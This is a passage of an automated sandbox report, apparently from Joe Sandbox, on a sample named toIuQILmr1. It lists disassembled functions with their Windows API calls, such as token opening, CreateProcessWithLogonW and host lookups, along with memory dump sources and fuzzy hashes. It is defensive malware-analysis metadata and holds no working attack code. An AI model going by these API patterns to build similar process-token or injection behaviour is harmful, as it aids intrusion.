                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AllocateHeap_free
                                          • String ID:
                                          • API String ID: 614378929-0
                                          • Opcode ID: bfd050e76d47970eddfe768a961d954efef5957dc330ea7d5c2bf410e80a0d61
                                          • Instruction ID: e61feb627f248471373c1c1b4df5bb8ffbe4671f9fb1d709f3cd7292345246c7
                                          • Opcode Fuzzy Hash: bfd050e76d47970eddfe768a961d954efef5957dc330ea7d5c2bf410e80a0d61
                                          • Instruction Fuzzy Hash: 0D11E733504B19AFCF312F70AC0567F3798DF103A4B11942AFA45B61D0DE7989819B70
                                          Function 00DD4531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00DD4560
                                            • Part of subcall function 00DD410D: _memset.LIBCMT ref: 00DD418D
                                            • Part of subcall function 00DD410D: _wcscpy.LIBCMT ref: 00DD41E1
                                            • Part of subcall function 00DD410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DD41F1
                                          • KillTimer.USER32(?,00000001,?,?), ref: 00DD45B5
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DD45C4
                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E0D6CE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                          • String ID:
                                          • API String ID: 1378193009-0
                                          • Opcode ID: 403f8f767c4f05db1f4fda9c456c6c3e4eb0c8f8454d0668660e63a610690c03
                                          • Instruction ID: 60ad3b0fa45efe63aaaca140e6f0d0ffc7d04dc1527b6702e8a3f5b07782af4f
                                          • Opcode Fuzzy Hash: 403f8f767c4f05db1f4fda9c456c6c3e4eb0c8f8454d0668660e63a610690c03
                                          • Instruction Fuzzy Hash: 5021FC709087849FEB328B64EC45BE7BBEC9F01308F04109FE69D66281C7755AC8CB61
                                          Function 00E28AF9 Relevance: 6.1, APIs: 4, Instructions: 65processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E28B2A
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00E28B31
                                          • CloseHandle.KERNEL32(00000004), ref: 00E28B4B
                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E28B7A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                          • String ID:
                                          • API String ID: 2621361867-0
                                          • Opcode ID: 2a6c52f1c2c2bc11f840e016028c741f876bce4d8f09b7f04d3981a1c9a2b433
                                          • Instruction ID: 585d0d38bd2dfdd3055205b1dd2c5baf5dd74372f36d24d88e5b9de99687ee88
                                          • Opcode Fuzzy Hash: 2a6c52f1c2c2bc11f840e016028c741f876bce4d8f09b7f04d3981a1c9a2b433
                                          • Instruction Fuzzy Hash: C01159B650120DAFDF018FA5ED49FDA7BA9EF08309F085069FE04B2160C7768D64EB60
                                          Function 00E4667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E37B20,?,?,00000000), ref: 00DD5B8C
                                            • Part of subcall function 00DD5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E37B20,?,?,00000000,?,?), ref: 00DD5BB0
                                          • gethostbyname.WS2_32(?), ref: 00E466AC
                                          • WSAGetLastError.WS2_32(00000000), ref: 00E466B7
                                          • _memmove.LIBCMT ref: 00E466E4
                                          • inet_ntoa.WS2_32(?), ref: 00E466EF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                          • String ID:
                                          • API String ID: 1504782959-0
                                          • Opcode ID: 7fd5d8cd48c746c97267a94d0921955fa114f56c4ecf43d3319dc4867577b37d
                                          • Instruction ID: 5e08c3219cc99a658d5e326323f6da90b471434475eb1c737e56e272ba781f8b
                                          • Opcode Fuzzy Hash: 7fd5d8cd48c746c97267a94d0921955fa114f56c4ecf43d3319dc4867577b37d
                                          • Instruction Fuzzy Hash: D8115B36900609AFCB04EBA4ED96DEEB7B8EF44311B144066F506B72A1DF31AE04CB71
                                          Function 00E29023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00E29043
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E29055
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E2906B
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E29086
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: b08ec163962e93629ae1ef37c9a7c538954f7701fdc04a72cbe34f137bd49d52
                                          • Instruction ID: a708c490c0f0db5c1e1a351a845393c7b26de42a9b1dc8584880478a34d8ea59
                                          • Opcode Fuzzy Hash: b08ec163962e93629ae1ef37c9a7c538954f7701fdc04a72cbe34f137bd49d52
                                          • Instruction Fuzzy Hash: 5C115E79900218FFEB10DFA5CC84EDDBBB4FB48710F2050A5EA04B7290D6716E10DB90
                                          Function 00E31652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E301FD,?,00E31250,?,00008000), ref: 00E3166F
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00E301FD,?,00E31250,?,00008000), ref: 00E31694
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E301FD,?,00E31250,?,00008000), ref: 00E3169E
                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,00E301FD,?,00E31250,?,00008000), ref: 00E316D1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CounterPerformanceQuerySleep
                                          • String ID:
                                          • API String ID: 2875609808-0
                                          • Opcode ID: 650285fcda94a541e06aad6587c7fe35041dd56ee2ed2cf6dcecb66bbac2e8ac
                                          • Instruction ID: efc13da76e44ed8cc59ae20c66491187e9570f30b5e139eddbbd9359668aeec2
                                          • Opcode Fuzzy Hash: 650285fcda94a541e06aad6587c7fe35041dd56ee2ed2cf6dcecb66bbac2e8ac
                                          • Instruction Fuzzy Hash: 93115A31C01A1CDBCF04AFE6D94AAEEBF78FF09742F054499E940B2241CB305560CBA6
                                          Function 00E07207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction ID: e8e2ed4dc54aeacba1cdc139ffda981a37138ed391e9cf92dc4beebc6bed1f4f
                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction Fuzzy Hash: CC01807284414EBBCF525F84CC018EE3F62BF59345B499515FA9868071D237E9B1AB81
                                          Function 00E5B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 00E5B59E
                                          • ScreenToClient.USER32(?,?), ref: 00E5B5B6
                                          • ScreenToClient.USER32(?,?), ref: 00E5B5DA
                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E5B5F5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ClientRectScreen$InvalidateWindow
                                          • String ID:
                                          • API String ID: 357397906-0
                                          • Opcode ID: e2328afe61a706c1503880ba9296c6c799409000dc9a90d6a2bc91c30d460ba2
                                          • Instruction ID: 44254dcf85371cb2082c1b21b0df8288d18e6d8b201d89ddcae09dcb3c7d7e98
                                          • Opcode Fuzzy Hash: e2328afe61a706c1503880ba9296c6c799409000dc9a90d6a2bc91c30d460ba2
                                          • Instruction Fuzzy Hash: 0A1143B9D00209EFDB41CFA9C8849EEFBB9FB08311F108566E915E3220D775AA558F91
                                          Function 00E5B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E5B8FE
                                          • _memset.LIBCMT ref: 00E5B90D
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E97F20,00E97F64), ref: 00E5B93C
                                          • CloseHandle.KERNEL32 ref: 00E5B94E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memset$CloseCreateHandleProcess
                                          • String ID:
                                          • API String ID: 3277943733-0
                                          • Opcode ID: 319801c30fe9681c7720ff032a079535f7664dca32e7b1b7493124ea119a3a69
                                          • Instruction ID: 76b6b556f9c9ccf59cdcb104e76124de7f4bcbbaa16b799e35c218c08f98d4eb
                                          • Opcode Fuzzy Hash: 319801c30fe9681c7720ff032a079535f7664dca32e7b1b7493124ea119a3a69
                                          • Instruction Fuzzy Hash: 31F054B26543047FF6102B62AC06F7B3A5CEB09355F005422FB48F51A1D771490887B8
                                          Function 00E36E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 00E36E88
                                            • Part of subcall function 00E3794E: _memset.LIBCMT ref: 00E37983
                                          • _memmove.LIBCMT ref: 00E36EAB
                                          • _memset.LIBCMT ref: 00E36EB8
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00E36EC8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                          • String ID:
                                          • API String ID: 48991266-0
                                          • Opcode ID: ea07c029d2251e06f10b099bac132c354a6642ae4c6cfc0fc6f00cff58f79ce4
                                          • Instruction ID: c6df75f7eca6da809e05c65c7463015cdd5fd5e7dcc3b8f6fedc8dba7ede34c7
                                          • Opcode Fuzzy Hash: ea07c029d2251e06f10b099bac132c354a6642ae4c6cfc0fc6f00cff58f79ce4
                                          • Instruction Fuzzy Hash: 3EF0547A100204AFCF016F55DC85B5ABB69EF45321F04C061FE086E226CB31E951CBB4
                                          Function 00E5C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DD134D
                                            • Part of subcall function 00DD12F3: SelectObject.GDI32(?,00000000), ref: 00DD135C
                                            • Part of subcall function 00DD12F3: BeginPath.GDI32(?), ref: 00DD1373
                                            • Part of subcall function 00DD12F3: SelectObject.GDI32(?,00000000), ref: 00DD139C
                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E5C030
                                          • LineTo.GDI32(00000000,?,?), ref: 00E5C03D
                                          • EndPath.GDI32(00000000), ref: 00E5C04D
                                          • StrokePath.GDI32(00000000), ref: 00E5C05B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                          • String ID:
                                          • API String ID: 1539411459-0
                                          • Opcode ID: d839afc8eafc8fab9a5b4b831aef485b0e31c98c8c36b118ec9e386cbee94eff
                                          • Instruction ID: 51f4a40b5d0f1d82ef39d37973eb3ab344411b2e51452962989636de8a8afa31
                                          • Opcode Fuzzy Hash: d839afc8eafc8fab9a5b4b831aef485b0e31c98c8c36b118ec9e386cbee94eff
                                          • Instruction Fuzzy Hash: DAF05E31001359FFDB266F56AC0EFCE3F99AF05312F184402FA11710E287765659DBA5
                                          Function 00E2A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E2A399
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E2A3AC
                                          • GetCurrentThreadId.KERNEL32 ref: 00E2A3B3
                                          • AttachThreadInput.USER32(00000000), ref: 00E2A3BA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                          • String ID:
                                          • API String ID: 2710830443-0
                                          • Opcode ID: 21b42eeef1c0f79500cb38c3832656de1b5238be49a4e8dc356d16b333872cc4
                                          • Instruction ID: 0274fbefd0938216afddafa4fb1620805db1a40d2ae565951a16cee1957a66f6
                                          • Opcode Fuzzy Hash: 21b42eeef1c0f79500cb38c3832656de1b5238be49a4e8dc356d16b333872cc4
                                          • Instruction Fuzzy Hash: D1E01571541328BBDB205FA2EC0CEDB3E1CEF167A2F048434F509A5061C6B1C5448BE0
                                          Function 00DD2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSysColor.USER32(00000008), ref: 00DD2231
                                          • SetTextColor.GDI32(?,000000FF), ref: 00DD223B
                                          • SetBkMode.GDI32(?,00000001), ref: 00DD2250
                                          • GetStockObject.GDI32(00000005), ref: 00DD2258
                                          • GetWindowDC.USER32(?,00000000), ref: 00E0C0D3
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E0C0E0
                                          • GetPixel.GDI32(00000000,?,00000000), ref: 00E0C0F9
                                          • GetPixel.GDI32(00000000,00000000,?), ref: 00E0C112
                                          • GetPixel.GDI32(00000000,?,?), ref: 00E0C132
                                          • ReleaseDC.USER32(?,00000000), ref: 00E0C13D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                          • String ID:
                                          • API String ID: 1946975507-0
                                          • Opcode ID: 64cc6d00e3a5569ebe2a29e43228174646c9a59a72ed6fc8219af180bcddfb12
                                          • Instruction ID: e2091efc50b395bfb91554d9f12f5d2a46ed73e15810b1fb47f4358a0afd82bc
                                          • Opcode Fuzzy Hash: 64cc6d00e3a5569ebe2a29e43228174646c9a59a72ed6fc8219af180bcddfb12
                                          • Instruction Fuzzy Hash: 3CE06D32100644EEDB255FB5FC0DBD87B20EB15337F148366FAA9680E287714984DB22
                                          Function 00E28C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentThread.KERNEL32 ref: 00E28C63
                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00E2882E), ref: 00E28C6A
                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E2882E), ref: 00E28C77
                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00E2882E), ref: 00E28C7E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CurrentOpenProcessThreadToken
                                          • String ID:
                                          • API String ID: 3974789173-0
                                          • Opcode ID: 947003dbb3b393d6b2b10dc5457bc6fa66b94f77915c7fb8d12e8040c33e1964
                                          • Instruction ID: 446bbe48821b63ae83994e01455781830e30cac1f68740aa4dbb18ce2a482994
